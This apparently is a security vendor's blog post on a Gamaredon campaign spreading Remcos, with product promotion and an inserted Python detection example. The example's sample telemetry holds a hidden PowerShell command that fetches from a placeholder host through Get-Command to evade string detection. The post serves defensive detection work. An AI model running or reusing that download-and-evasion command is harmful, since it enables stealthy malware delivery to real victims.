The russia-linked Gamaredon APT, notorious for a wealth of cyber-offensive operations against Ukraine, has resurfaced in the cyber threat arena. The ongoing Gamaredon adversary campaign against Ukraine leverages malicious LNK files disguised as war-related lures to deploy the Remcos backdoor and applies sophisticated techniques, such as DLL sideloading.
Detect Gamaredon Group Attacks
The russia-affiliated hacking groups remain a persistent threat to organizations globally, continuously refining their tactics to evade detection. Since the outbreak of the full-scale war in Ukraine, these APT groups have escalated their operations, using the conflict as a testing ground to innovate and scale their offensive strategies. Once polished, these methods are unleashed on high-profile global targets that align with Moscow’s strategic objectives, expanding the cyber threat landscape worldwide. This relentless activity forces security professionals to seek reliable detection content and advanced threat detection and hunting tools to stay ahead of evolving adversaries.
To spot russia-backed Gamaredon APT attacks at the earliest stages, cyber defenders might rely on SOC Prime Platform, which serves a complete product suite for AI-powered detection engineering, automated threat hunting, and advanced threat detection. Just press the Explore Detections button below to drill down immediately to a curated set of Sigma rules addressing the latest Gamaredon campaign spreading Remcos.
Explore Detections
All the rules are compatible with multiple SIEM, EDR, and Data Lake technologies and mapped to the MITRE ATT&CK® framework to streamline threat investigation. Additionally, each rule is enriched with extensive metadata, including CTI links, attack timelines, triage recommendations, and more.
Additionally, security professionals can hunt for IOCs from the latest Cisco Talos report on the Gamaredon campaign. With Uncoder AI acting as a private non-agentic AI for threat-informed detection engineering, defenders can enable fast IOC sweeps by automatically parsing these IOCs and transforming them into custom queries tailored for the chosen SIEM or EDR platform.
And there is a lot more Uncoder AI can offer. In March, SOC Prime released a major upgrade to Uncoder AI, offering privacy-first, unlimited LLM capabilities that let you always stay in control of your interaction with AI. Automatically detect the language of your code and gain a concise summary or an in-depth decision tree, supercharge your detection strategies with MITRE ATT&CK® ML-powered code tagging and unlimited autocompletion, and optimize your native-language query with AI.
Security professionals seeking more detection content addressing Gamaredon TTPs to analyze the group’s activity retrospectively might browse Threat Detection Marketplace using the following tags: “UAC-0010,” “Gamaredon,” “Hive0051,” “ACTINIUM,” “Primitive Bear,” “Armageddon Group,” “Aqua Blizzard,” “WINTERFLOUNDER,” “UNC530,” “Shuckworm.”
Gamaredon Campaign Analysis: Latest Attacks Spreading Remcos
The russian state-sponsored APT group known as Gamaredon Group (aka Hive0051, UAC-0010, or Armageddon APT) has been conducting cyber-espionage campaigns against Ukrainian organizations since 2014, ramping up its attacks following russia’s full-scale invasion of Ukraine on February 24, 2022. Despite the ongoing conflict, the group has maintained a steady level of activity, continuously deploying its malicious tools and remaining the most persistent hacking entity targeting Ukraine.
Cisco Talos researchers have uncovered an ongoing Gamaredon campaign that relies on spear-phishing to target Ukrainian users with weaponized LNK files disguised as Office documents. Active since November 2024, the group’s latest campaign exploits war-related themes to deliver the Remcos backdoor. While the exact delivery method remains unclear, researchers suspect Gamaredon continues using phishing emails, either attaching the ZIP file directly or providing a link to download it from a remote server.
Notably, the Remcos RAT leveraged in Gamaredon’s latest offensive operation is commonly abused by cybercriminals for data theft and system manipulation and has long been part of the adversary toolkit of multiple hacking collectives targeting Ukraine. For instance, the russia-backed hacking group UAC-0050 has weaponized Remcos in phishing attacks, primarily against Ukrainian state entities.
Gamaredon has previously been known for exploiting the Ukraine invasion theme in its phishing campaigns, and this operation follows the same pattern. The group distributes malicious LNK files within ZIP archives, often masquerading as Office documents with invasion-related filenames.
Gamaredon’s latest campaign uses malicious LNK files containing obfuscated PowerShell scripts to download and execute the Remcos backdoor while displaying a decoy file to mask the infection. These scripts use the Get-Command cmdlet to bypass string-based detection. The payload servers, based in Germany and russia, restrict access to Ukrainian victims.
Once downloaded, the ZIP file is extracted to the %TEMP% folder, where a legitimate application loads a malicious DLL via sideloading. This technique decrypts and runs the final Remcos payload, evading traditional defenses. The phishing emails likely include either direct ZIP attachments or links to download them.
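As an added illustration (not code from SOC Prime, Cisco Talos, or the campaign itself), the Python below encodes the two observable stages described above as detection checks: PowerShell launched from an LNK that resolves cmdlets through Get-Command, and an executable running out of %TEMP% that sideloads an unsigned DLL from its own directory. It runs them over constructed Sysmon-style events; the field names, paths, and placeholder URL are assumptions, not indicators from the report.

```python
import re

# Illustration only, not SOC Prime's or Talos' code; fields follow Sysmon naming,
# and every path, host and URL below is a constructed placeholder.
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
GET_COMMAND = re.compile(r"\bget-command\b", re.IGNORECASE)  # indirect cmdlet lookup

def lnk_powershell_suspect(ev):
    # Sysmon EID 1: PowerShell spawned by explorer.exe (what an LNK double-click
    # looks like) with Get-Command in the command line instead of a plain cmdlet name.
    if ev.get("EventID") != 1:
        return False
    image = ev.get("Image", "").lower()
    parent = ev.get("ParentImage", "").lower()
    return (image.endswith(("\\powershell.exe", "\\pwsh.exe"))
            and parent.endswith("\\explorer.exe")
            and GET_COMMAND.search(ev.get("CommandLine", "")) is not None)

def temp_sideload_suspect(ev):
    # Sysmon EID 7: an executable running out of %TEMP% loads an unsigned DLL
    # from its own directory, the shape of the sideloading step described above.
    if ev.get("EventID") != 7:
        return False
    image, dll = ev.get("Image", ""), ev.get("ImageLoaded", "")
    same_dir = image.rsplit("\\", 1)[0].lower() == dll.rsplit("\\", 1)[0].lower()
    return (TEMP_DIR.search(image) is not None and same_dir
            and dll.lower().endswith(".dll")
            and ev.get("Signed", "true").lower() == "false")

def triage(events):
    # Return (EventID, rule) pairs for every event that matched, in input order.
    rules = [("lnk_powershell_get_command", lnk_powershell_suspect),
             ("temp_dll_sideload", temp_sideload_suspect)]
    return [(ev["EventID"], name) for ev in events for name, fn in rules if fn(ev)]

# Constructed sample telemetry: two hits and two benign look-alikes.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'powershell.exe -w hidden -c "& (Get-Command Invoke-WebRequest) http://placeholder.invalid/a"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\backup.ps1"},
    {"EventID": 7, "Image": r"C:\Users\u\AppData\Local\Temp\viewer.exe",
     "ImageLoaded": r"C:\Users\u\AppData\Local\Temp\helper.dll", "Signed": "false"},
    {"EventID": 7, "Image": r"C:\Program Files\Viewer\viewer.exe",
     "ImageLoaded": r"C:\Program Files\Viewer\helper.dll", "Signed": "true"},
]
```

Both checks are deliberately narrow (parent process, %TEMP% location, signature state) so that ordinary PowerShell scripts and DLLs loaded from Program Files do not fire; tune the paths to your own telemetry before deploying.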
The campaign exploits geopolitical themes, and metadata analysis suggests only two machines generated these LNK files, which aligns with Gamaredon’s previous tactics.
The use of advanced adversary techniques in the latest Gamaredon campaign, such as DLL sideloading, geo-fenced servers, and themed phishing lures, points to the group’s ongoing efforts to target Ukraine amid geopolitical unrest. To counter these threats, organizations are encouraged to strengthen their defenses at scale. SOC Prime Platform for collective cyber defense equips security teams with cutting-edge technologies that fuse AI, automation, and real-time threat intelligence to help them proactively defend against APT attacks and evolving cyber threats.